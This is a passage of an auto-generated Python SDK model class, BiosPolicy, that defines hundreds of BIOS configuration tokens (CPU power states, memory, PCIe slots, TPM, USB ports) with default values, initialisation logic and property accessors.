cpu_power_management='platform-default', demand_scrub='platform-default', direct_cache_access='platform-default', dram_clock_throttling='platform-default', dram_refresh_rate='platform-default', energy_efficient_turbo='platform-default', eng_perf_tuning='platform-default', enhanced_intel_speed_step_tech='platform-default', epp_profile='platform-default', execute_disable_bit='platform-default', extended_apic='platform-default', flow_control='platform-default', frb2enable='platform-default', hardware_prefetch='platform-default', hwpm_enable='platform-default', imc_interleave='platform-default', intel_hyper_threading_tech='platform-default', intel_turbo_boost_tech='platform-default', intel_virtualization_technology='platform-default', intel_vt_for_directed_io='platform-default', intel_vtd_coherency_support='platform-default', intel_vtd_interrupt_remapping='platform-default', intel_vtd_pass_through_dma_support='platform-default', intel_vtdats_support='platform-default', ioh_error_enable='platform-default', ioh_resource='platform-default', ip_prefetch='platform-default', ipv6pxe='platform-default', kti_prefetch='platform-default', legacy_os_redirection='platform-default', legacy_usb_support='platform-default', llc_prefetch='platform-default', lom_port0state='platform-default', lom_port1state='platform-default', lom_port2state='platform-default', lom_port3state='platform-default', lom_ports_all_state='platform-default', lv_ddr_mode='platform-default', make_device_non_bootable='platform-default', memory_inter_leave='platform-default', memory_mapped_io_above4gb='platform-default', mirroring_mode='platform-default', mmcfg_base='platform-default', numa_optimized='platform-default', onboard10gbit_lom='platform-default', onboard_gbit_lom='platform-default', 
onboard_scu_storage_support='platform-default', onboard_scu_storage_sw_stack='platform-default', organization=None, os_boot_watchdog_timer='platform-default', os_boot_watchdog_timer_policy='platform-default', os_boot_watchdog_timer_timeout='platform-default', out_of_band_mgmt_port='platform-default', package_cstate_limit='platform-default', patrol_scrub='platform-default', patrol_scrub_duration='platform-default', pc_ie_ssd_hot_plug_support='platform-default', pch_usb30mode='platform-default', pci_option_ro_ms='platform-default', pci_rom_clp='platform-default', pop_support='platform-default', post_error_pause='platform-default', processor_c1e='platform-default', processor_c3report='platform-default', processor_c6report='platform-default', processor_cstate='platform-default', profiles=None, psata='platform-default', pstate_coord_type='platform-default', putty_key_pad='platform-default', pwr_perf_tuning='platform-default', qpi_link_frequency='platform-default', qpi_snoop_mode='platform-default', rank_inter_leave='platform-default', redirection_after_post='platform-default', sata_mode_select='platform-default', select_memory_ras_configuration='platform-default', serial_port_aenable='platform-default', single_pctl_enable='platform-default', slot10link_speed='platform-default', slot10state='platform-default', slot11link_speed='platform-default', slot11state='platform-default', slot12link_speed='platform-default', slot12state='platform-default', slot1link_speed='platform-default', slot1state='platform-default', slot2link_speed='platform-default', slot2state='platform-default', slot3link_speed='platform-default', slot3state='platform-default', slot4link_speed='platform-default', slot4state='platform-default', slot5link_speed='platform-default', slot5state='platform-default', slot6link_speed='platform-default', slot6state='platform-default', slot7link_speed='platform-default', slot7state='platform-default', slot8link_speed='platform-default', slot8state='platform-default', slot9link_speed='platform-default', slot9state='platform-default', slot_flom_link_speed='platform-default', slot_front_nvme1link_speed='platform-default', slot_front_nvme2link_speed='platform-default', slot_front_slot5link_speed='platform-default', slot_front_slot6link_speed='platform-default', slot_hba_link_speed='platform-default', slot_hba_state='platform-default', slot_lom1link='platform-default', slot_lom2link='platform-default', slot_mezz_state='platform-default', slot_mlom_link_speed='platform-default', slot_mlom_state='platform-default', slot_mraid_link_speed='platform-default', slot_mraid_state='platform-default', slot_n10state='platform-default', slot_n11state='platform-default', slot_n12state='platform-default', slot_n13state='platform-default', slot_n14state='platform-default', slot_n15state='platform-default', slot_n16state='platform-default', slot_n17state='platform-default', slot_n18state='platform-default', slot_n19state='platform-default', slot_n1state='platform-default', slot_n20state='platform-default', slot_n21state='platform-default', slot_n22state='platform-default', slot_n23state='platform-default', slot_n24state='platform-default', slot_n2state='platform-default', slot_n3state='platform-default', slot_n4state='platform-default', slot_n5state='platform-default', slot_n6state='platform-default', slot_n7state='platform-default', slot_n8state='platform-default', slot_n9state='platform-default', slot_raid_link_speed='platform-default', slot_raid_state='platform-default', 
slot_rear_nvme1link_speed='platform-default', slot_rear_nvme1state='platform-default', slot_rear_nvme2link_speed='platform-default', slot_rear_nvme2state='platform-default', slot_rear_nvme3state='platform-default', slot_rear_nvme4state='platform-default', slot_rear_nvme5state='platform-default', slot_rear_nvme6state='platform-default', slot_rear_nvme7state='platform-default', slot_rear_nvme8state='platform-default', slot_riser1link_speed='platform-default', slot_riser1slot1link_speed='platform-default', slot_riser1slot2link_speed='platform-default', slot_riser1slot3link_speed='platform-default', slot_riser2link_speed='platform-default', slot_riser2slot4link_speed='platform-default', slot_riser2slot5link_speed='platform-default', slot_riser2slot6link_speed='platform-default', slot_sas_state='platform-default', slot_ssd_slot1link_speed='platform-default', slot_ssd_slot2link_speed='platform-default', smee='platform-default', smt_mode='platform-default', snc='platform-default', sparing_mode='platform-default', sr_iov='platform-default', streamer_prefetch='platform-default', svm_mode='platform-default', terminal_type='platform-default', tpm_control='platform-default', tpm_support='platform-default', txt_support='platform-default', ucsm_boot_order_rule='platform-default', usb_emul6064='platform-default', usb_port_front='platform-default', usb_port_internal='platform-default', usb_port_kvm='platform-default', usb_port_rear='platform-default', usb_port_sd_card='platform-default', usb_port_vmedia='platform-default', usb_xhci_support='platform-default', vga_priority='platform-default', vmd_enable='platform-default', work_load_config='platform-default', xpt_prefetch='platform-default'):
"""
BiosPolicy - a model defined in Swagger
"""
self._account_moid = None
self._ancestors = None
self._create_time = None
self._mod_time = None
self._moid = None
self._object_type = None
self._owners = None
self._parent = None
self._tags = None
self._version_context = None
self._description = None
self._name = None
self._adjacent_cache_line_prefetch = None
self._all_usb_devices = None
self._altitude = None
self._aspm_support = None
self._assert_nmi_on_perr = None
self._assert_nmi_on_serr = None
self._auto_cc_state = None
self._autonumous_cstate_enable = None
self._baud_rate = None
self._bme_dma_mitigation = None
self._boot_option_num_retry = None
self._boot_option_re_cool_down = None
self._boot_option_retry = None
self._boot_performance_mode = None
self._cbs_cmn_cpu_cpb = None
self._cbs_cmn_cpu_gen_downcore_ctrl = None
self._cbs_cmn_cpu_global_cstate_ctrl = None
self._cbs_cmn_cpu_l1stream_hw_prefetcher = None
self._cbs_cmn_cpu_l2stream_hw_prefetcher = None
self._cbs_cmn_determinism_slider = None
self._cbs_cmn_gnb_nb_iommu = None
self._cbs_cmn_mem_ctrl_bank_group_swap_ddr4 = None
self._cbs_cmn_mem_map_bank_interleave_ddr4 = None
self._cbs_cmnc_tdp_ctl = None
self._cbs_df_cmn_mem_intlv = None
self._cbs_df_cmn_mem_intlv_size = None
self._cdn_enable = None
self._cdn_support = None
self._channel_inter_leave = None
self._cke_low_policy = None
self._closed_loop_therm_throtl = None
self._cmci_enable = None
self._config_tdp = None
self._console_redirection = None
self._core_multi_processing = None
self._cpu_energy_performance = None
self._cpu_frequency_floor = None
self._cpu_performance = None
self._cpu_power_management = None
self._demand_scrub = None
self._direct_cache_access = None
self._dram_clock_throttling = None
self._dram_refresh_rate = None
self._energy_efficient_turbo = None
self._eng_perf_tuning = None
self._enhanced_intel_speed_step_tech = None
self._epp_profile = None
self._execute_disable_bit = None
self._extended_apic = None
self._flow_control = None
self._frb2enable = None
self._hardware_prefetch = None
self._hwpm_enable = None
self._imc_interleave = None
self._intel_hyper_threading_tech = None
self._intel_turbo_boost_tech = None
self._intel_virtualization_technology = None
self._intel_vt_for_directed_io = None
self._intel_vtd_coherency_support = None
self._intel_vtd_interrupt_remapping = None
self._intel_vtd_pass_through_dma_support = None
self._intel_vtdats_support = None
self._ioh_error_enable = None
self._ioh_resource = None
self._ip_prefetch = None
self._ipv6pxe = None
self._kti_prefetch = None
self._legacy_os_redirection = None
self._legacy_usb_support = None
self._llc_prefetch = None
self._lom_port0state = None
self._lom_port1state = None
self._lom_port2state = None
self._lom_port3state = None
self._lom_ports_all_state = None
self._lv_ddr_mode = None
self._make_device_non_bootable = None
self._memory_inter_leave = None
self._memory_mapped_io_above4gb = None
self._mirroring_mode = None
self._mmcfg_base = None
self._numa_optimized = None
self._onboard10gbit_lom = None
self._onboard_gbit_lom = None
self._onboard_scu_storage_support = None
self._onboard_scu_storage_sw_stack = None
self._organization = None
self._os_boot_watchdog_timer = None
self._os_boot_watchdog_timer_policy = None
self._os_boot_watchdog_timer_timeout = None
self._out_of_band_mgmt_port = None
self._package_cstate_limit = None
self._patrol_scrub = None
self._patrol_scrub_duration = None
self._pc_ie_ssd_hot_plug_support = None
self._pch_usb30mode = None
self._pci_option_ro_ms = None
self._pci_rom_clp = None
self._pop_support = None
self._post_error_pause = None
self._processor_c1e = None
self._processor_c3report = None
self._processor_c6report = None
self._processor_cstate = None
self._profiles = None
self._psata = None
self._pstate_coord_type = None
self._putty_key_pad = None
self._pwr_perf_tuning = None
self._qpi_link_frequency = None
self._qpi_snoop_mode = None
self._rank_inter_leave = None
self._redirection_after_post = None
self._sata_mode_select = None
self._select_memory_ras_configuration = None
self._serial_port_aenable = None
self._single_pctl_enable = None
self._slot10link_speed = None
self._slot10state = None
self._slot11link_speed = None
self._slot11state = None
self._slot12link_speed = None
self._slot12state = None
self._slot1link_speed = None
self._slot1state = None
self._slot2link_speed = None
self._slot2state = None
self._slot3link_speed = None
self._slot3state = None
self._slot4link_speed = None
self._slot4state = None
self._slot5link_speed = None
self._slot5state = None
self._slot6link_speed = None
self._slot6state = None
self._slot7link_speed = None
self._slot7state = None
self._slot8link_speed = None
self._slot8state = None
self._slot9link_speed = None
self._slot9state = None
self._slot_flom_link_speed = None
self._slot_front_nvme1link_speed = None
self._slot_front_nvme2link_speed = None
self._slot_front_slot5link_speed = None
self._slot_front_slot6link_speed = None
self._slot_hba_link_speed = None
self._slot_hba_state = None
self._slot_lom1link = None
self._slot_lom2link = None
self._slot_mezz_state = None
self._slot_mlom_link_speed = None
self._slot_mlom_state = None
self._slot_mraid_link_speed = None
self._slot_mraid_state = None
self._slot_n10state = None
self._slot_n11state = None
self._slot_n12state = None
self._slot_n13state = None
self._slot_n14state = None
self._slot_n15state = None
self._slot_n16state = None
self._slot_n17state = None
self._slot_n18state = None
self._slot_n19state = None
self._slot_n1state = None
self._slot_n20state = None
self._slot_n21state = None
self._slot_n22state = None
self._slot_n23state = None
self._slot_n24state = None
self._slot_n2state = None
self._slot_n3state = None
self._slot_n4state = None
self._slot_n5state = None
self._slot_n6state = None
self._slot_n7state = None
self._slot_n8state = None
self._slot_n9state = None
self._slot_raid_link_speed = None
self._slot_raid_state = None
self._slot_rear_nvme1link_speed = None
self._slot_rear_nvme1state = None
self._slot_rear_nvme2link_speed = None
self._slot_rear_nvme2state = None
self._slot_rear_nvme3state = None
self._slot_rear_nvme4state = None
self._slot_rear_nvme5state = None
self._slot_rear_nvme6state = None
self._slot_rear_nvme7state = None
self._slot_rear_nvme8state = None
self._slot_riser1link_speed = None
self._slot_riser1slot1link_speed = None
self._slot_riser1slot2link_speed = None
self._slot_riser1slot3link_speed = None
self._slot_riser2link_speed = None
self._slot_riser2slot4link_speed = None
self._slot_riser2slot5link_speed = None
self._slot_riser2slot6link_speed = None
self._slot_sas_state = None
self._slot_ssd_slot1link_speed = None
self._slot_ssd_slot2link_speed = None
self._smee = None
self._smt_mode = None
self._snc = None
self._sparing_mode = None
self._sr_iov = None
self._streamer_prefetch = None
self._svm_mode = None
self._terminal_type = None
self._tpm_control = None
self._tpm_support = None
self._txt_support = None
self._ucsm_boot_order_rule = None
self._usb_emul6064 = None
self._usb_port_front = None
self._usb_port_internal = None
self._usb_port_kvm = None
self._usb_port_rear = None
self._usb_port_sd_card = None
self._usb_port_vmedia = None
self._usb_xhci_support = None
self._vga_priority = None
self._vmd_enable = None
self._work_load_config = None
self._xpt_prefetch = None
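# Route each non-None argument through its public property so that the
# setter validation runs. Because the BIOS tokens default to
# 'platform-default' rather than None, they are always assigned here; only
# the None-defaulted reference fields are skipped when not supplied.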
if account_moid is not None:
self.account_moid = account_moid
if ancestors is not None:
self.ancestors = ancestors
if create_time is not None:
self.create_time = create_time
if mod_time is not None:
self.mod_time = mod_time
if moid is not None:
self.moid = moid
if object_type is not None:
self.object_type = object_type
if owners is not None:
self.owners = owners
if parent is not None:
self.parent = parent
if tags is not None:
self.tags = tags
if version_context is not None:
self.version_context = version_context
if description is not None:
self.description = description
if name is not None:
self.name = name
if adjacent_cache_line_prefetch is not None:
self.adjacent_cache_line_prefetch = adjacent_cache_line_prefetch
if all_usb_devices is not None:
self.all_usb_devices = all_usb_devices
if altitude is not None:
self.altitude = altitude
if aspm_support is not None:
self.aspm_support = aspm_support
if assert_nmi_on_perr is not None:
self.assert_nmi_on_perr = assert_nmi_on_perr
if assert_nmi_on_serr is not None:
self.assert_nmi_on_serr = assert_nmi_on_serr
if auto_cc_state is not None:
self.auto_cc_state = auto_cc_state
if autonumous_cstate_enable is not None:
self.autonumous_cstate_enable = autonumous_cstate_enable
if baud_rate is not None:
self.baud_rate = baud_rate
if bme_dma_mitigation is not None:
self.bme_dma_mitigation = bme_dma_mitigation
if boot_option_num_retry is not None:
self.boot_option_num_retry = boot_option_num_retry
if boot_option_re_cool_down is not None:
self.boot_option_re_cool_down = boot_option_re_cool_down
if boot_option_retry is not None:
self.boot_option_retry = boot_option_retry
if boot_performance_mode is not None:
self.boot_performance_mode = boot_performance_mode
if cbs_cmn_cpu_cpb is not None:
self.cbs_cmn_cpu_cpb = cbs_cmn_cpu_cpb
if cbs_cmn_cpu_gen_downcore_ctrl is not None:
self.cbs_cmn_cpu_gen_downcore_ctrl = cbs_cmn_cpu_gen_downcore_ctrl
if cbs_cmn_cpu_global_cstate_ctrl is not None:
self.cbs_cmn_cpu_global_cstate_ctrl = cbs_cmn_cpu_global_cstate_ctrl
if cbs_cmn_cpu_l1stream_hw_prefetcher is not None:
self.cbs_cmn_cpu_l1stream_hw_prefetcher = cbs_cmn_cpu_l1stream_hw_prefetcher
if cbs_cmn_cpu_l2stream_hw_prefetcher is not None:
self.cbs_cmn_cpu_l2stream_hw_prefetcher = cbs_cmn_cpu_l2stream_hw_prefetcher
if cbs_cmn_determinism_slider is not None:
self.cbs_cmn_determinism_slider = cbs_cmn_determinism_slider
if cbs_cmn_gnb_nb_iommu is not None:
self.cbs_cmn_gnb_nb_iommu = cbs_cmn_gnb_nb_iommu
if cbs_cmn_mem_ctrl_bank_group_swap_ddr4 is not None:
self.cbs_cmn_mem_ctrl_bank_group_swap_ddr4 = cbs_cmn_mem_ctrl_bank_group_swap_ddr4
if cbs_cmn_mem_map_bank_interleave_ddr4 is not None:
self.cbs_cmn_mem_map_bank_interleave_ddr4 = cbs_cmn_mem_map_bank_interleave_ddr4
if cbs_cmnc_tdp_ctl is not None:
self.cbs_cmnc_tdp_ctl = cbs_cmnc_tdp_ctl
if cbs_df_cmn_mem_intlv is not None:
self.cbs_df_cmn_mem_intlv = cbs_df_cmn_mem_intlv
if cbs_df_cmn_mem_intlv_size is not None:
self.cbs_df_cmn_mem_intlv_size = cbs_df_cmn_mem_intlv_size
if cdn_enable is not None:
self.cdn_enable = cdn_enable
if cdn_support is not None:
self.cdn_support = cdn_support
if channel_inter_leave is not None:
self.channel_inter_leave = channel_inter_leave
if cke_low_policy is not None:
self.cke_low_policy = cke_low_policy
if closed_loop_therm_throtl is not None:
self.closed_loop_therm_throtl = closed_loop_therm_throtl
if cmci_enable is not None:
self.cmci_enable = cmci_enable
if config_tdp is not None:
self.config_tdp = config_tdp
if console_redirection is not None:
self.console_redirection = console_redirection
if core_multi_processing is not None:
self.core_multi_processing = core_multi_processing
if cpu_energy_performance is not None:
self.cpu_energy_performance = cpu_energy_performance
if cpu_frequency_floor is not None:
self.cpu_frequency_floor = cpu_frequency_floor
if cpu_performance is not None:
self.cpu_performance = cpu_performance
if cpu_power_management is not None:
self.cpu_power_management = cpu_power_management
if demand_scrub is not None:
self.demand_scrub = demand_scrub
if direct_cache_access is not None:
self.direct_cache_access = direct_cache_access
if dram_clock_throttling is not None:
self.dram_clock_throttling = dram_clock_throttling
if dram_refresh_rate is not None:
self.dram_refresh_rate = dram_refresh_rate
if energy_efficient_turbo is not None:
self.energy_efficient_turbo = energy_efficient_turbo
if eng_perf_tuning is not None:
self.eng_perf_tuning = eng_perf_tuning
if enhanced_intel_speed_step_tech is not None:
self.enhanced_intel_speed_step_tech = enhanced_intel_speed_step_tech
if epp_profile is not None:
self.epp_profile = epp_profile
if execute_disable_bit is not None:
self.execute_disable_bit = execute_disable_bit
if extended_apic is not None:
self.extended_apic = extended_apic
if flow_control is not None:
self.flow_control = flow_control
if frb2enable is not None:
self.frb2enable = frb2enable
if hardware_prefetch is not None:
self.hardware_prefetch = hardware_prefetch
if hwpm_enable is not None:
self.hwpm_enable = hwpm_enable
if imc_interleave is not None:
self.imc_interleave = imc_interleave
if intel_hyper_threading_tech is not None:
self.intel_hyper_threading_tech = intel_hyper_threading_tech
if intel_turbo_boost_tech is not None:
self.intel_turbo_boost_tech = intel_turbo_boost_tech
if intel_virtualization_technology is not None:
self.intel_virtualization_technology = intel_virtualization_technology
if intel_vt_for_directed_io is not None:
self.intel_vt_for_directed_io = intel_vt_for_directed_io
if intel_vtd_coherency_support is not None:
self.intel_vtd_coherency_support = intel_vtd_coherency_support
if intel_vtd_interrupt_remapping is not None:
self.intel_vtd_interrupt_remapping = intel_vtd_interrupt_remapping
if intel_vtd_pass_through_dma_support is not None:
self.intel_vtd_pass_through_dma_support = intel_vtd_pass_through_dma_support
if intel_vtdats_support is not None:
self.intel_vtdats_support = intel_vtdats_support
if ioh_error_enable is not None:
self.ioh_error_enable = ioh_error_enable
if ioh_resource is not None:
self.ioh_resource = ioh_resource
if ip_prefetch is not None:
self.ip_prefetch = ip_prefetch
if ipv6pxe is not None:
self.ipv6pxe = ipv6pxe
if kti_prefetch is not None:
self.kti_prefetch = kti_prefetch
if legacy_os_redirection is not None:
self.legacy_os_redirection = legacy_os_redirection
if legacy_usb_support is not None:
self.legacy_usb_support = legacy_usb_support
if llc_prefetch is not None:
self.llc_prefetch = llc_prefetch
if lom_port0state is not None:
self.lom_port0state = lom_port0state
if lom_port1state is not None:
self.lom_port1state = lom_port1state
if lom_port2state is not None:
self.lom_port2state = lom_port2state
if lom_port3state is not None:
self.lom_port3state = lom_port3state
if lom_ports_all_state is not None:
self.lom_ports_all_state = lom_ports_all_state
if lv_ddr_mode is not None:
self.lv_ddr_mode = lv_ddr_mode
if make_device_non_bootable is not None:
self.make_device_non_bootable = make_device_non_bootable
if memory_inter_leave is not None:
self.memory_inter_leave = memory_inter_leave
if memory_mapped_io_above4gb is not None:
self.memory_mapped_io_above4gb = memory_mapped_io_above4gb
if mirroring_mode is not None:
self.mirroring_mode = mirroring_mode
if mmcfg_base is not None:
self.mmcfg_base = mmcfg_base
if numa_optimized is not None:
self.numa_optimized = numa_optimized
if onboard10gbit_lom is not None:
self.onboard10gbit_lom = onboard10gbit_lom
if onboard_gbit_lom is not None:
self.onboard_gbit_lom = onboard_gbit_lom
if onboard_scu_storage_support is not None:
self.onboard_scu_storage_support = onboard_scu_storage_support
if onboard_scu_storage_sw_stack is not None:
self.onboard_scu_storage_sw_stack = onboard_scu_storage_sw_stack
if organization is not None:
self.organization = organization
if os_boot_watchdog_timer is not None:
self.os_boot_watchdog_timer = os_boot_watchdog_timer
if os_boot_watchdog_timer_policy is not None:
self.os_boot_watchdog_timer_policy = os_boot_watchdog_timer_policy
if os_boot_watchdog_timer_timeout is not None:
self.os_boot_watchdog_timer_timeout = os_boot_watchdog_timer_timeout
if out_of_band_mgmt_port is not None:
self.out_of_band_mgmt_port = out_of_band_mgmt_port
if package_cstate_limit is not None:
self.package_cstate_limit = package_cstate_limit
if patrol_scrub is not None:
self.patrol_scrub = patrol_scrub
if patrol_scrub_duration is not None:
self.patrol_scrub_duration = patrol_scrub_duration
if pc_ie_ssd_hot_plug_support is not None:
self.pc_ie_ssd_hot_plug_support = pc_ie_ssd_hot_plug_support
if pch_usb30mode is not None:
self.pch_usb30mode = pch_usb30mode
if pci_option_ro_ms is not None:
self.pci_option_ro_ms = pci_option_ro_ms
if pci_rom_clp is not None:
self.pci_rom_clp = pci_rom_clp
if pop_support is not None:
self.pop_support = pop_support
if post_error_pause is not None:
self.post_error_pause = post_error_pause
if processor_c1e is not None:
self.processor_c1e = processor_c1e
if processor_c3report is not None:
self.processor_c3report = processor_c3report
if processor_c6report is not None:
self.processor_c6report = processor_c6report
if processor_cstate is not None:
self.processor_cstate = processor_cstate
if profiles is not None:
self.profiles = profiles
if psata is not None:
self.psata = psata
if pstate_coord_type is not None:
self.pstate_coord_type = pstate_coord_type
if putty_key_pad is not None:
self.putty_key_pad = putty_key_pad
if pwr_perf_tuning is not None:
self.pwr_perf_tuning = pwr_perf_tuning
if qpi_link_frequency is not None:
self.qpi_link_frequency = qpi_link_frequency
if qpi_snoop_mode is not None:
self.qpi_snoop_mode = qpi_snoop_mode
if rank_inter_leave is not None:
self.rank_inter_leave = rank_inter_leave
if redirection_after_post is not None:
self.redirection_after_post = redirection_after_post
if sata_mode_select is not None:
self.sata_mode_select = sata_mode_select
if select_memory_ras_configuration is not None:
self.select_memory_ras_configuration = select_memory_ras_configuration
if serial_port_aenable is not None:
self.serial_port_aenable = serial_port_aenable
if single_pctl_enable is not None:
self.single_pctl_enable = single_pctl_enable
if slot10link_speed is not None:
self.slot10link_speed = slot10link_speed
if slot10state is not None:
self.slot10state = slot10state
if slot11link_speed is not None:
self.slot11link_speed = slot11link_speed
if slot11state is not None:
self.slot11state = slot11state
if slot12link_speed is not None:
self.slot12link_speed = slot12link_speed
if slot12state is not None:
self.slot12state = slot12state
if slot1link_speed is not None:
self.slot1link_speed = slot1link_speed
if slot1state is not None:
self.slot1state = slot1state
if slot2link_speed is not None:
self.slot2link_speed = slot2link_speed
if slot2state is not None:
self.slot2state = slot2state
if slot3link_speed is not None:
self.slot3link_speed = slot3link_speed
if slot3state is not None:
self.slot3state = slot3state
if slot4link_speed is not None:
self.slot4link_speed = slot4link_speed
if slot4state is not None:
self.slot4state = slot4state
if slot5link_speed is not None:
self.slot5link_speed = slot5link_speed
if slot5state is not None:
self.slot5state = slot5state
if slot6link_speed is not None:
self.slot6link_speed = slot6link_speed
if slot6state is not None:
self.slot6state = slot6state
if slot7link_speed is not None:
self.slot7link_speed = slot7link_speed
if slot7state is not None:
self.slot7state = slot7state
if slot8link_speed is not None:
self.slot8link_speed = slot8link_speed
if slot8state is not None:
self.slot8state = slot8state
if slot9link_speed is not None:
self.slot9link_speed = slot9link_speed
if slot9state is not None:
self.slot9state = slot9state
if slot_flom_link_speed is not None:
self.slot_flom_link_speed = slot_flom_link_speed
if slot_front_nvme1link_speed is not None:
self.slot_front_nvme1link_speed = slot_front_nvme1link_speed
if slot_front_nvme2link_speed is not None:
self.slot_front_nvme2link_speed = slot_front_nvme2link_speed
if slot_front_slot5link_speed is not None:
self.slot_front_slot5link_speed = slot_front_slot5link_speed
if slot_front_slot6link_speed is not None:
self.slot_front_slot6link_speed = slot_front_slot6link_speed
if slot_hba_link_speed is not None:
self.slot_hba_link_speed = slot_hba_link_speed
if slot_hba_state is not None:
self.slot_hba_state = slot_hba_state
if slot_lom1link is not None:
self.slot_lom1link = slot_lom1link
if slot_lom2link is not None:
self.slot_lom2link = slot_lom2link
if slot_mezz_state is not None:
self.slot_mezz_state = slot_mezz_state
if slot_mlom_link_speed is not None:
self.slot_mlom_link_speed = slot_mlom_link_speed
if slot_mlom_state is not None:
self.slot_mlom_state = slot_mlom_state
if slot_mraid_link_speed is not None:
self.slot_mraid_link_speed = slot_mraid_link_speed
if slot_mraid_state is not None:
self.slot_mraid_state = slot_mraid_state
if slot_n10state is not None:
self.slot_n10state = slot_n10state
if slot_n11state is not None:
self.slot_n11state = slot_n11state
if slot_n12state is not None:
self.slot_n12state = slot_n12state
if slot_n13state is not None:
self.slot_n13state = slot_n13state
if slot_n14state is not None:
self.slot_n14state = slot_n14state
if slot_n15state is not None:
self.slot_n15state = slot_n15state
if slot_n16state is not None:
self.slot_n16state = slot_n16state
if slot_n17state is not None:
self.slot_n17state = slot_n17state
if slot_n18state is not None:
self.slot_n18state = slot_n18state
if slot_n19state is not None:
self.slot_n19state = slot_n19state
if slot_n1state is not None:
self.slot_n1state = slot_n1state
if slot_n20state is not None:
self.slot_n20state = slot_n20state
if slot_n21state is not None:
self.slot_n21state = slot_n21state
if slot_n22state is not None:
self.slot_n22state = slot_n22state
if slot_n23state is not None:
self.slot_n23state = slot_n23state
if slot_n24state is not None:
self.slot_n24state = slot_n24state
if slot_n2state is not None:
self.slot_n2state = slot_n2state
if slot_n3state is not None:
self.slot_n3state = slot_n3state
if slot_n4state is not None:
self.slot_n4state = slot_n4state
if slot_n5state is not None:
self.slot_n5state = slot_n5state
if slot_n6state is not None:
self.slot_n6state = slot_n6state
if slot_n7state is not None:
self.slot_n7state = slot_n7state
if slot_n8state is not None:
self.slot_n8state = slot_n8state
if slot_n9state is not None:
self.slot_n9state = slot_n9state
if slot_raid_link_speed is not None:
self.slot_raid_link_speed = slot_raid_link_speed
if slot_raid_state is not None:
self.slot_raid_state = slot_raid_state
if slot_rear_nvme1link_speed is not None:
self.slot_rear_nvme1link_speed = slot_rear_nvme1link_speed
if slot_rear_nvme1state is not None:
self.slot_rear_nvme1state = slot_rear_nvme1state
if slot_rear_nvme2link_speed is not None:
self.slot_rear_nvme2link_speed = slot_rear_nvme2link_speed
if slot_rear_nvme2state is not None:
self.slot_rear_nvme2state = slot_rear_nvme2state
if slot_rear_nvme3state is not None:
self.slot_rear_nvme3state = slot_rear_nvme3state
if slot_rear_nvme4state is not None:
self.slot_rear_nvme4state = slot_rear_nvme4state
if slot_rear_nvme5state is not None:
self.slot_rear_nvme5state = slot_rear_nvme5state
if slot_rear_nvme6state is not None:
self.slot_rear_nvme6state = slot_rear_nvme6state
if slot_rear_nvme7state is not None:
self.slot_rear_nvme7state = slot_rear_nvme7state
if slot_rear_nvme8state is not None:
self.slot_rear_nvme8state = slot_rear_nvme8state
if slot_riser1link_speed is not None:
self.slot_riser1link_speed = slot_riser1link_speed
if slot_riser1slot1link_speed is not None:
self.slot_riser1slot1link_speed = slot_riser1slot1link_speed
if slot_riser1slot2link_speed is not None:
self.slot_riser1slot2link_speed = slot_riser1slot2link_speed
if slot_riser1slot3link_speed is not None:
self.slot_riser1slot3link_speed = slot_riser1slot3link_speed
if slot_riser2link_speed is not None:
self.slot_riser2link_speed = slot_riser2link_speed
if slot_riser2slot4link_speed is not None:
self.slot_riser2slot4link_speed = slot_riser2slot4link_speed
if slot_riser2slot5link_speed is not None:
self.slot_riser2slot5link_speed = slot_riser2slot5link_speed
if slot_riser2slot6link_speed is not None:
self.slot_riser2slot6link_speed = slot_riser2slot6link_speed
if slot_sas_state is not None:
self.slot_sas_state = slot_sas_state
if slot_ssd_slot1link_speed is not None:
self.slot_ssd_slot1link_speed = slot_ssd_slot1link_speed
if slot_ssd_slot2link_speed is not None:
self.slot_ssd_slot2link_speed = slot_ssd_slot2link_speed
if smee is not None:
self.smee = smee
if smt_mode is not None:
self.smt_mode = smt_mode
if snc is not None:
self.snc = snc
if sparing_mode is not None:
self.sparing_mode = sparing_mode
if sr_iov is not None:
self.sr_iov = sr_iov
if streamer_prefetch is not None:
self.streamer_prefetch = streamer_prefetch
if svm_mode is not None:
self.svm_mode = svm_mode
if terminal_type is not None:
self.terminal_type = terminal_type
if tpm_control is not None:
self.tpm_control = tpm_control
if tpm_support is not None:
self.tpm_support = tpm_support
if txt_support is not None:
self.txt_support = txt_support
if ucsm_boot_order_rule is not None:
self.ucsm_boot_order_rule = ucsm_boot_order_rule
if usb_emul6064 is not None:
self.usb_emul6064 = usb_emul6064
if usb_port_front is not None:
self.usb_port_front = usb_port_front
if usb_port_internal is not None:
self.usb_port_internal = usb_port_internal
if usb_port_kvm is not None:
self.usb_port_kvm = usb_port_kvm
if usb_port_rear is not None:
self.usb_port_rear = usb_port_rear
if usb_port_sd_card is not None:
self.usb_port_sd_card = usb_port_sd_card
if usb_port_vmedia is not None:
self.usb_port_vmedia = usb_port_vmedia
if usb_xhci_support is not None:
self.usb_xhci_support = usb_xhci_support
if vga_priority is not None:
self.vga_priority = vga_priority
if vmd_enable is not None:
self.vmd_enable = vmd_enable
if work_load_config is not None:
self.work_load_config = work_load_config
if xpt_prefetch is not None:
self.xpt_prefetch = xpt_prefetch
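# The property accessors below follow one repeating shape: the getter
# returns the private backing field, and the setter stores the value after
# performing any validation.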
@property
def account_moid(self):
"""
Gets the account_moid of this BiosPolicy.
The Account ID for this managed object.
:return: The account_moid of this BiosPolicy.
:rtype: str
"""
return self._account_moid
@account_moid.setter
def account_moid(self, account_moid):
"""
Sets the account_moid of this BiosPolicy.
The Account ID for this managed object.
:param account_moid: The account_moid of this BiosPolicy.
:type: str
"""
self._account_moid = account_moid
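# The managed-object base fields (account_moid through name) are plain
# pass-through accessors with no value checking, unlike the BIOS token
# accessors further down.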
@property
def ancestors(self):
"""
Gets the ancestors of this BiosPolicy.
Ancestors is an array containing the MO references of the ancestors in the object containment hierarchy.
:return: The ancestors of this BiosPolicy.
:rtype: list[MoBaseMoRef]
"""
return self._ancestors
@ancestors.setter
def ancestors(self, ancestors):
"""
Sets the ancestors of this BiosPolicy.
Ancestors is an array containing the MO references of the ancestors in the object containment hierarchy.
:param ancestors: The ancestors of this BiosPolicy.
:type: list[MoBaseMoRef]
"""
self._ancestors = ancestors
@property
def create_time(self):
"""
Gets the create_time of this BiosPolicy.
The time when this managed object was created.
:return: The create_time of this BiosPolicy.
:rtype: datetime
"""
return self._create_time
@create_time.setter
def create_time(self, create_time):
"""
Sets the create_time of this BiosPolicy.
The time when this managed object was created.
:param create_time: The create_time of this BiosPolicy.
:type: datetime
"""
self._create_time = create_time
@property
def mod_time(self):
"""
Gets the mod_time of this BiosPolicy.
The time when this managed object was last modified.
